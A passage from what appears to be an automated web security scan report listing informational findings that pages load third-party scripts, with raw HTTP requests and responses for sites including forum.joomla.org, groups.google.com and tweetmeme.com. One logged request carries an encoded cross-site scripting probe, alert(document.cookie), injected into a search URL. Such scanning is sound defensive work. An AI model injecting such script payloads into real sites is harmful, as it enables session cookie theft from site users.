Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=8bf49cdc15c7d3663590ff1e8621f7ff; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</form>
                                       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&amp;lang=en"></script>
...[SNIP]...

21.204. http://forum.joomla.org/viewtopic.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /viewtopic.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en

Request

GET /viewtopic.php HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=205a140070d9b3ef733ecd9f83473999; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</form>
                                       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&amp;lang=en"></script>
...[SNIP]...

21.205. http://gegnia.com/joomla/informacion/mbrriti-joomla-1-pik-6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gegnia.com
Path:   /joomla/informacion/mbrriti-joomla-1-pik-6

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.statcounter.com/counter/counter_xhtml.js

Request

GET /joomla/informacion/mbrriti-joomla-1-pik-6 HTTP/1.1
Host: gegnia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:50 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 22bae4d6bb8978acd20b7a9dac0f3f85=ovtfp6obggr08kcq0mtis1qq55; path=/
Last-Modified: Mon, 24 Jan 2011 15:11:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sq-al" lang="sq-al" dir=
...[SNIP]...
</script>

<script type="text/javascript"

src="http://pagead2.googlesyndication.com/pagead/show_ads.js">


</script>
...[SNIP]...
</script>

<script type="text/javascript"

src="http://pagead2.googlesyndication.com/pagead/show_ads.js">


</script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter_xhtml.js">
</script>
...[SNIP]...

21.206. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/js/abg.js
  • http://pagead2.googlesyndication.com/pagead/js/graphics.js

Request

GET /pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898475&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0094017143&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=16&xpc=hchF3t9VxU&p=http%3A//linux.maruhn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://linux.maruhn.com/sec/aub.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 21:59:43 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4614

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

21.207. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/js/graphics.js
  • http://pagead2.googlesyndication.com/pagead/sma8.js

Request

GET /pagead/ads?client=ca-pub-1167317790835381&output=html&h=90&slotname=4186215650&w=728&lmt=1295924672&flash=10.1.103&url=http%3A%2F%2Fwww.masjo.com%2Fsearch%2Flearn%2Btyping%2Bquick%2Band%2Beasy%2Bcracka074f%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec4a5acfda9b%2Fpage%2F419%2Fx22&dt=1295903072605&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903072701&frm=0&adk=2067819403&ga_vid=1825936610.1295903073&ga_sid=1295903073&ga_hid=1582079438&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&eid=36813006&ref=http%3A%2F%2Fburp%2Fshow%2F30&fu=0&ifi=1&dtd=129&xpc=3dz1EGZpFY&p=http%3A//www.masjo.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 21:03:50 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14841

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#3088ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

21.208. http://green.autobytel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://green.autobytel.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.home/hybr;abr=!ie;kw=hybr;info=27696;u=|||45B1051A-C3B3-0EF2-D7DB92DCE61CE4CF|||27696|||;sz=597x90;ord=52541936?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://www.bkrtx.com/js/bk-static.js

Request

GET / HTTP/1.1
Host: green.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: cweb=JONQJVS10.4.128.192CKMMI; path=/
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: USER_UUID_VCH=45B1050B%2DCA19%2DA839%2DE9A7BDE5F665AC56;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2014%3A35%3A00%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2018%3A36%3A00%27%7D;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: ID=27696%3Bhybd;path=/
Set-Cookie: HOMEVERSION=2;path=/
Date: Mon, 24 Jan 2011 22:36:00 GMT
Connection: close
Content-Length: 31347

<!-- CWEB429 --><!-- green -->

<html>

<head>


<title>New Cars | Used Cars for Sale | New and Used Car Prices</title>

<!-- meta -->

<meta name="description" content="New cars, used cars: prices
...[SNIP]...
27696;u=|||45B1051A-C3B3-0EF2-D7DB92DCE61CE4CF|||27696|||;sz=586x90;ord=52541936?" name="frame1" width="586" height="93" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
       <script language="Javascript1.1" SRC="http://ad.doubleclick.net/adj/abtl.home/hybr;abr=!ie;kw=hybr;info=27696;u=|||45B1051A-C3B3-0EF2-D7DB92DCE61CE4CF|||27696|||;sz=597x90;ord=52541936?">
       </script>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...

21.209. http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d88e74c2ce639c72:TM=1295908559:LM=1295908559:S=1dDmt8z2wKvU3vZb; expires=Wed, 23-Jan-2013 22:35:59 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:35:59 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

21.210. http://groups.google.com/group/joomla-commits/topics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/joomla-commits/topics

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /group/joomla-commits/topics HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=1f5b6d5c3757484d:TM=1295908558:LM=1295908558:S=Imk6vvNPJNnIIJTB; expires=Wed, 23-Jan-2013 22:35:58 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:35:58 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

21.211. http://groups.google.com/group/joomla-dev-framework

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/joomla-dev-framework

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /group/joomla-dev-framework HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:35:59 GMT
Expires: Mon, 24 Jan 2011 22:35:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

21.212. http://groups.google.com/group/joomla-dev-general

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/joomla-dev-general

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /group/joomla-dev-general HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:35:58 GMT
Expires: Mon, 24 Jan 2011 22:35:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

21.213. http://groups.google.com/group/joomlabugsquad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/joomlabugsquad

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /group/joomlabugsquad HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:36:57 GMT
Expires: Mon, 24 Jan 2011 22:36:57 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

21.214. http://groups.google.com/grphp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d51180940e0c5c74:TM=1295908560:LM=1295908561:S=YmAugaRj6BceMOsC; expires=Wed, 23-Jan-2013 22:36:01 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:36:01 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

21.215. http://hairmakeup.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hairmakeup.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: hairmakeup.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:01:46 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=7db031caf49ce4f498af46ce33d5f0b8; expires=Tue, 01-Feb-2011 15:01:46 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0050179958343506
X-Served-In: 0.084240913391113
X-Served-By: ded2059
Content-Length: 42145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.216. http://help.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET / HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jcahvhmi593kcks9omcs8qbp63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.217. http://help.tweetmeme.com/2009/04/07/api-documentation/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/07/api-documentation/

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /2009/04/07/api-documentation/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=fri7ds4g5e569ab52b67udmd34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.218. http://help.tweetmeme.com/2009/04/09/rss-feeds/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/rss-feeds/

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /2009/04/09/rss-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dea45f6dnud0kld58ppcjlmap1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.219. http://help.tweetmeme.com/2009/04/09/twitter-feeds/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/twitter-feeds/

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /2009/04/09/twitter-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6fjaaa6od3bhvj75ou4s3p06f2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.220. http://help.tweetmeme.com/contact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /contact/

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /contact/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p918mp9o4urak293n2lk14io61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<link rel="stylesheet" href="http://help.tweetmeme.com/wp-content/themes/wiki/style.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.221. http://help.tweetmeme.com/language/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /language/

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /language/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
